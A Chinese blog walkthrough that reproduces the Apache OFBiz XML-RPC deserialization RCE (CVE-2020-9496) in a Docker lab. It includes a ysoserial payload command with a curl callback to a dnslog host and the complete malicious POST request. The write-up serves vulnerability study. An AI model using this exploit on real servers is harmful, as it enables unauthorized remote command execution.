Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496)漏洞

最新推荐文章于 2025-03-14 11:33:57 发布
最新推荐文章于 2025-03-14 11:33:57 发布
阅读量1.2k 收藏 1
点赞数 1
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_48413667/article/details/120226685
版权

一、软件介绍

Apache OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。

二、漏洞描述

Apache OFBiz在17.12.04版本之前的XMLRPC接口存在一处反序列化漏洞,攻击者利用这个漏洞可以在目标服务器上执行任意命令。

三、影响范围

17.12.04版本之前

四、复现环境

目标机:Ubuntu21.4

攻击机:kali2021

五、漏洞复现

1、环境搭建,Ubuntu需要安装docker20.10.7和docker-compose1.29.2(docker环境搭建可自行百度)

2、通过docker-compose.yml文件自动下载并启动Apache OFBiz镜像和容器,文件内容如下,也可以手动拉取镜像

 

 在文件目录下执行docker-compose up -d

执行不了的用sudo命令,网络问题无法下载镜像的多试几次或修改配置文件使用国内镜像库(这里自行百度)

用docker ps命令查看镜像是否启动

这里显示镜像正常启动了,kali访https://your-ip:8433/myportal/control/main看到登录页面证明环境搭建完成

使用ysoserial的CommonsBeanutils1来生成Payload,命令如下:

java -jar ysoserial-master-8eb5cbfbf6-1.jar CommonsBeanutils1 "curl hhgdg3.dnslog.cn" | base64 | tr -d "\n"

生成如下经过base64编码的payload

通过bp抓包,将请求包修改为如下数据包

POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

将[base64-payload] 替换为上面生成的payload,然后发送请求

 刷新dnslog,查看攻击结果

 

 

 

 

 

天将明D
关注
Apache OFBiz 未授权远程代码执行漏洞CVE-2024-45195)
iSee857的博客
09-08 1203
Apache OFBiz是⼀个著名的电⼦商务平台,提供了创建基于最新 J2EE/ XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应⽤服务器的多层、分布式电⼦商务类WEB应⽤系统的框架。Apache OFBiz 18.12.16 之前版本中,由于Web 应用程序中缺少视图授权检查,未经身份验证的远程威胁者可构造恶意请求写入恶意文件导致远程代码执行,从而获取服务器权限。在服务器上启动一个python http服务用以 请求发送。服务器上启的http服务收到访问链接。访问下列接口进行RCE验证。
Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856)
0xSec
08-05 1385
2024年8月,互联网上披露Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856),该漏洞允许未经过身份验证的远程攻击者绕过原有通过特定URL绕过检测执行恶意代码的安全机制。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。
[CVE-2020-9496]Apache Ofbiz RCE
公众号shadow sock7
09-23 2789
参考: Apache Ofbiz RCE (CVE-2020-9496) 漏洞分析 CVE-2020-9496 apache ofbiz xml-rpc反序列化漏洞分析 https://www.zerodayinitiative.com/blog/2020/9/14/cve-2020-9496-rce-in-apache-ofbiz-xmlrpc-via-deserialization-of-untrusted-data 如果遇到java.lang.UnsupportedClassVersionErr
漏洞预警 | Apache OFBiz 服务端模板注入漏洞CVE-2025-26865)
最新发布
C20220511的博客
03-14 497
Apache OFBiz 是一个 开源的企业资源规划(ERP)系统 ,由 Apache 软件基金会维护。它旨在帮助企业整合和管理核心业务流程,支持从供应链管理、财务管理到客户服务的全方位业务需求。据描述,由于 Apache OFBiz 插件的特殊字段使用不当导致 freemarker 模板引擎注入,攻击者可以精心构造特殊请求,注入恶意的代码,导致任意代码执行,进而威胁整个服务器安全。近日,Apache OFBiz 发布更新修复 freemarker 模板注入漏洞CVE-2025-26865)。
Apache OFBiz远程代码执行漏洞通告
爱国小白帽
05-01 715
报告编号:B6-2021-042801 报告来源:360CERT 报告作者:360CERT 更新日期:2021-04-28 1 漏洞简述 2021年04月28日,360CERT监测发现Apache OFBiz发布了漏洞风险通告,共包含2个漏洞漏洞编号分别为CVE-2021-29200,CVE-2021-30128,漏洞等级:严重,漏洞评分:9.8。 OFBiz是一个非常著名的电子商务平台,其提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子
Apache OfBiz 反序列化命令执行漏洞CVE-2020-9496
黑白的博客
12-27 1614
声明 好好学习,天天向上 漏洞描述 Apache OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。 其17.12.04版本之前的XMLRPC接口存在一处反序列化漏洞,攻击者利用这个漏洞可以
CVE-2020-9496 Apache OFBiz XML-RPC反序列化漏洞复现
Shadow_DAI_990101的博客
08-23 3472
CVE-2020-9496 Apache OFBiz XML-RPC反序列化漏洞复现
CVE-2020-9496 ofbiz反序列化漏洞分析1
08-03
CVE-2020-9496 ofbiz反序列化漏洞分析 OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、...
Apache OfBiz 反序列化命令执行漏洞
weixin_43567873的博客
03-11 113
Apache OfBiz 反序列化命令执行漏洞
APACHE OFBIZ XML-RPC 反序列化漏洞 (CVE-2020-9496) 的复现与分析
smellycat000的专栏
12-23 1406
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 简介相关的重点类和方法:org.apache.xmlrpc.parser.Serializabl...
CVE-2021-26295 Apache OFBiz反序列化远程代码执行漏洞复现
afei001
04-01 690
目录 1.漏洞概述 2.漏洞原理 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 docker搭建漏洞环境 5.2 DNSlog验证CVE-2021-26295 5.3 CVE-2021-26295_Apache_OFBiz_POC.py 6.漏洞修复 1.漏洞概述 Apache OFBiz是一个非常著名的电子商务平台。它是用于企业流程自动化的开源产品。它包括用于ERP,CRM。构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统...
Apache Ofbiz XMLRPC RCE漏洞CVE-2020-9496)复现
m0_48520508的博客
02-20 1440
0x00简介 Apache OFBiz全称是The ApacheOpen For Business Project。是开放的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新的J2EE/XML规范和技术标准,构建大中型企业级、快平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz几乎实现了所有的J2EE核心设计模式,各个模块之间的耦合比较松散,用户能够比较容易的根据自己的需要进行拆卸,非常灵活。 0x01漏洞概述 Apache ofbiz 存在反序列化漏洞,攻击者
Apache OFBiz 曝出严重漏洞,允许预身份验证 RCE
FreeBuf_的博客
08-06 748
近日,研究人员发现 Apache OFBiz 中存在一个新的关键漏洞,该漏洞Apache OFBiz 中的一个错误授权问题,被追踪为CVE-2024-38856。SonicWall 的安全研究员 Hasib Vhora 与其他安全专家在公告中写道:如果满足某些先决条件,如屏幕定义没有明确检查用户的权限,因为它们依赖于终端的配置,那么未经验证的终端可能允许执行屏幕的屏幕渲染代码。该问题源于身份验证机制中的一个漏洞,它允许未经身份验证的用户访问通常仅限已登录用户使用的功能,从而可能导致远程代码执行。
Apache OFBiz漏洞 CVE-2023-49070 的前世今生
离别歌
12-08 1272
最新的Apache OFBiz XML-RPC 反序列化漏洞,讲讲它的前世今生。前世Apache OFBiz是一个开源的开发框架,它提供了一些预置的逻辑用于开发企业级的业务流程。早在2020年,Apache OFBiz就曾出现过一个反序列化漏洞CVE-2020-9496),问题出现在XML-RPC这个组件中。XML-RPC也是Apache基金会旗下的一个项目,但基本上在2010年前后就不更新了,...
Apache OFBiz 10.04.05 发布,安全漏洞修复
weixin_33957648的博客
01-21 110
"Apache OFBiz 10.04.05" 是一个 bugfix 版本,建议升级,因为该版本修复了安全漏洞 (CVE-2013-0177) OFBiz 是开放的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务 器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套...
Apache OFBiz SSRF漏洞CVE-2024-45507分析
INSBUG的博客
09-27 1000
由于Apache OFBiz在从Groovy加载文件时未对用户提交的数据进行过滤,未经身份验证的恶意攻击者通过服务器端请求伪造的方式向任意系统发起请求,加载远程恶意xml执行任意代码,从而获取目标服务器的控制权限,具体来说,攻击者可以构造一个恶意的 XML 文件,并通过 SSRF 攻击让 Apache OFBiz 的服务器加载并执行这个文件中的 Groovy 脚本。接收的URL将被视作一个模型屏幕(modelScreen)并进行解析,参照可以根据代码中的示例来构建一个概念验证包含命令的XML文件。
漏洞复现】Apache OFBiz 路径遍历导致RCE漏洞(CVE-2024-36104)
qq_67810151的博客
06-07 825
Apache OFBiz是一个功能强大、易于定制和扩展的开源ERP系统,适用于各种类型的企业。通过利用最新的技术标准和开源项目,Apache OFBiz为企业提供了一个高效、稳定、灵活的电子商务平台解决方案。
漏洞复现】Apache OFBiz 授权不当致远程代码执行
今天是几号的博客
08-06 1058
攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。Apache OFBiz 是一个开源的企业资源计划 (ERP) 和客户关系管理 (CRM) 软件平台,提供全面的企业管理解决方案,包括电子商务、库存管理、制造、会计等功能,支持企业进行灵活的定制和扩展。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
CVE-2020-9496
08-31
CVE-2020-9496Apache Ofbiz组件中的一个漏洞。根据引用和引用的内容,该漏洞被评级为高危,漏洞评分为8.0。这个漏洞的具体细节和复现可以参考引用中的文章。根据引用的内容,该漏洞是通过利用Apache Ofbiz中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值